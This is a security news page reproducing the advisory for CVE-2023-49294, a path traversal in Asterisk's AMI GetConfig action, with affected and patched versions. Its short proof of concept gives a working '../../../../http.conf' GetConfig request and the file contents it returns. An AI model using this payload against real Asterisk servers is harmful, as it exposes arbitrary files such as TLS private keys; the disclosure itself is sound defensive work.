Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-49294: Path traversal via AMI GetConfig allows access to outside files

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the live_dangerously is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.

CVE
#git#ssl

Package

asterisk (Asterisk)

Affected versions

<= 18.20.0

<= 20.5.0

= 21.0.0

Patched versions

18.20.1

20.5.1

21.0.1

certified-asterisk (Asterisk)

Summary

It is possible to read any arbitrary file via AMI even when the live_dangerously is not enabled.

Details

CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

https://owasp.org/www-community/attacks/Path_Traversal
https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757

PoC

cp /config/asterisk/default/http.conf /

This is denied as expected:

Action: GetConfig
Filename: /http.conf
ActionID: 09235013

Response: Error
ActionID: 09235013
Message: File requires escalated priveledges

This is not denied as expected:

Action: GetConfig
Filename: ../../../../http.conf
ActionID: 09235015

Response: Success
ActionID: 09235015
Category-000000: general
Line-000000-000000: enabled=yes
Line-000000-000001: bindaddr=[::]
Line-000000-000002: bindport=8088
Line-000000-000003: tlsenable=yes
Line-000000-000004: tlsbindaddr=[::]:8089
Line-000000-000005: tlscertfile=/etc/asterisk/keys/fullchain.pem
Line-000000-000006: tlsprivatekey=/etc/asterisk/keys/privkey.pem

Impact

Allow arbitrary files to be read.

Related news

Debian Security Advisory 5596-1

Debian Linux Security Advisory 5596-1 - Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907